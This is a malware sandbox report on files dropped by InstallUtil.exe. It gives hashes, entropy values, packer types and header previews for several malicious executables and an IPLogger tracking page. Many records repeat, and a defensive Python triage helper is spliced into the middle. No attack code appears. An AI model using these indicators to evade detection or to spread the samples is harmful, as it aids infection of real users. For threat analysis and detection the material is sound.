                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.768474290842228
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:4nSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHS:7WqlkLESgCRE/vhOjb05efd6e/oXHS
                                                                                                                                                                                                                                MD5:95F97B76DCB43201CEBCFACE99D5C36C
                                                                                                                                                                                                                                SHA1:44B55EE7AADD00158A2BCD4180C96566CB043E3B
                                                                                                                                                                                                                                SHA-256:5E5F06B401B4865D5491BF3CEBD43116F17CBFE71D3884B7674CE5D617338DDC
                                                                                                                                                                                                                                SHA-512:B1800B9F1F928765ED6984874FBA5876C1D80B1CC7F574740F2997E4ECC5F51F826CF38209C201BBBC05A0FCC2C72203F8166783510A05380FE9BA012F86C282
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.768478150231569
Encrypted:false
SSDEEP:49152:enSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXH8:tWqlkLESgCRE/vhOjb05efd6e/oXH8
MD5:B8ACE348FC73163DC5C13EFA0E554A89
SHA1:3BCC053EED10399CEC9B9B57651BB8E10C7F8EB7
SHA-256:D415E52DE093B9E9487FCC3244F190AFEFF659473172E3292C14A8E95F2FA101
SHA-512:B42085040F6C61E56EF8C297563104C60A222064B830CB086AC5C7AFB8FE25A4D6E27EB3E8DC58F398B9725087B30233CD0717DA06FF0BC20F16FCB2B657CDE4
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4283784
Entropy (8bit):7.981853182461957
Encrypted:false
SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
MD5:F0A6999F1BC47C6C468CF6DB95003AD5
SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2172545
Entropy (8bit):7.994835824960051
Encrypted:true
SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
MD5:9D959BCB3482D418504AF43B76F7A181
SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4283784
Entropy (8bit):7.981853182461957
Encrypted:false
SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
MD5:F0A6999F1BC47C6C468CF6DB95003AD5
SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
                                                                                                                                                                                                                                SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4283784
                                                                                                                                                                                                                                Entropy (8bit):7.981853182461957
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
                                                                                                                                                                                                                                MD5:F0A6999F1BC47C6C468CF6DB95003AD5
                                                                                                                                                                                                                                SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
                                                                                                                                                                                                                                SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
                                                                                                                                                                                                                                SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.768474108976907
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:GnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHr:VWqlkLESgCRE/vhOjb05efd6e/oXHr
                                                                                                                                                                                                                                MD5:C070D0E52433F284E0F3C6C5CCB957FA
                                                                                                                                                                                                                                SHA1:44FAE2AFC77F2DE20CB7CA671FC68B3A4D4C58EC
                                                                                                                                                                                                                                SHA-256:AC759E9BD6BDD4BD7BC7DBA5F7E1666A20C009C003B5560ED91ADCCA12279CB2
                                                                                                                                                                                                                                SHA-512:9CF5BD11E7A57AFC44580BBE4A92E2AC9338CAAF7EE10E1486700DFEFA151CA8112B705B475B8CBEEB33A4136F3BEF5C599F8C3661B810DD73BFF09FF7588150
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S...... ....@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4283784
                                                                                                                                                                                                                                Entropy (8bit):7.981853182461957
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
                                                                                                                                                                                                                                MD5:F0A6999F1BC47C6C468CF6DB95003AD5
                                                                                                                                                                                                                                SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
                                                                                                                                                                                                                                SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
                                                                                                                                                                                                                                SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
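The dropped-file records above repeat the same few fields for every artifact: size, 8-bit entropy, an "Encrypted" flag, the hash set, and a byte preview of the header. The following helper reproduces that triage offline so the numbers can be checked against the report's values on a local copy of a sample. It is an added example, not Joe Sandbox code: the entropy-threshold constant is a hypothetical value chosen for this example (the page does not state the rule behind its "Encrypted" flag), the packer heuristics are the well-known section-name markers visible in the previews (UPX0/UPX1, NSIS .ndata, Borland/Delphi CODE/DATA with an "MZP" stub), and the sample bytes are constructed, not taken from the report.

```python
"""Offline triage of a dropped file in the shape of a sandbox dropped-file record.

Added example, not Joe Sandbox code. The threshold below is an assumption:
the report's own criterion for its "Encrypted" flag is not documented here.
"""
import hashlib
import math
from collections import Counter

HIGH_ENTROPY_THRESHOLD = 7.9  # hypothetical; chosen only for this example

# Verbatim byte markers that the report previews expose. Matching any of them
# is only a hint that the file is packed or wrapped by an installer.
PACKER_MARKERS = (
    (b"UPX0", "UPX (UPX0/UPX1 sections)"),
    (b".ndata", "NSIS installer (.ndata section)"),
    (b"CODE\x00\x00\x00\x00", "Borland/Delphi linker (CODE/DATA/BSS sections)"),
)


def shannon_entropy_8bit(data: bytes) -> float:
    """Bits per byte on the same 0.0..8.0 scale as the report's 'Entropy (8bit)' field."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def preview(data: bytes, length: int = 64) -> str:
    """Render bytes as the report's 'Preview' field does: printable ASCII kept, the rest shown as '.'."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data[:length])


def is_pe(data: bytes) -> bool:
    """True when the DOS stub's e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def packer_hints(header: bytes) -> list:
    """Packer / installer hints derived from the first kilobyte only."""
    hints = []
    if header.startswith(b"MZP"):
        hints.append("'MZP' DOS stub (typical of Delphi-built PEs)")
    for marker, label in PACKER_MARKERS:
        if marker in header:
            hints.append(label)
    return hints


def triage(data: bytes) -> dict:
    """Build one record with the same fields as the report's dropped-file table."""
    ent = shannon_entropy_8bit(data)
    return {
        "size": len(data),
        "entropy": round(ent, 6),
        "high_entropy": ent >= HIGH_ENTROPY_THRESHOLD,  # assumption, see threshold note
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "is_pe": is_pe(data),
        "packer_hints": packer_hints(data[:1024]),
        "preview": preview(data),
    }


# Constructed sample: a minimal MZ/PE header (e_lfanew = 0x40) carrying UPX0/UPX1
# section names, followed by uniformly distributed filler so the body is
# near-maximal entropy. Not a real binary and not from the report.
SAMPLE_PACKED = (
    b"MZ" + b"\x00" * 58 + b"\x40\x00\x00\x00"
    + b"PE\x00\x00" + b"\x4c\x01" + b"\x00" * 18
    + b"UPX0\x00\x00\x00\x00" + b"UPX1\x00\x00\x00\x00"
    + bytes(range(256)) * 64
)

# Constructed low-entropy sample standing in for the dropped HTML document.
SAMPLE_TEXT = b'<!DOCTYPE html>\n<html lang="" class="html">\n<head>\n' * 40

if __name__ == "__main__":
    for name, blob in (("packed", SAMPLE_PACKED), ("text", SAMPLE_TEXT)):
        rec = triage(blob)
        print(name, rec["size"], rec["entropy"], rec["high_entropy"], rec["packer_hints"])
        print("  ", rec["preview"])
```

Run it against a real dropped file by reading the bytes from disk and passing them to `triage`; the MD5/SHA1/SHA-256 values should match the record's hashes exactly, while the entropy matches to the precision the report prints. Treat `high_entropy` as a prompt to unpack or emulate, not as a verdict: a UPX-packed file can sit below the threshold (the 2960760-byte UPX sample above reports 7.768) while a plain NSIS installer with compressed payload sits above it.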
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
